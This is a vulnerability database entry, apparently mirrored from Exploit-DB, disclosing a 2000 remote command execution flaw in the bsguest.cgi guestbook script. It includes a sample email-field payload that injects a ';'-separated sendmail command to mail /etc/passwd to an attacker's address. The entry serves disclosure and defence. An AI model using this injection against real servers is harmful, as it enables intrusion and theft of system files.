Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbRivendell_teamEDB-ID:20524
HistoryDec 20, 2000 - 12:00 a.m.

Brian Stanback bsguest.cgi 1.0 - Remote Command Execution

2000-12-2000:00:00
rivendell_team
www.exploit-db.com
26

7.4 High

AI Score

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/2159/info

An input validation vulnerability exists in Brian Stanback's bsguest.cgi, a script designed to coordinate guestbook submissions from website visitors.

The script fails to properly filter ';' characters from the user-supplied email address collected by the script.

As a result, maliciously-formed values for this field can cause the the script to run arbitrary shell commands with the privilege level of the web server.


Attacker enters his email address as <[email protected]>

'[email protected];/usr/sbin/sendmail [email protected] < /etc/passwd',

server mails a confirmation letter along with the passwd file to the attacker.

7.4 High

AI Score

Confidence

Low

JSON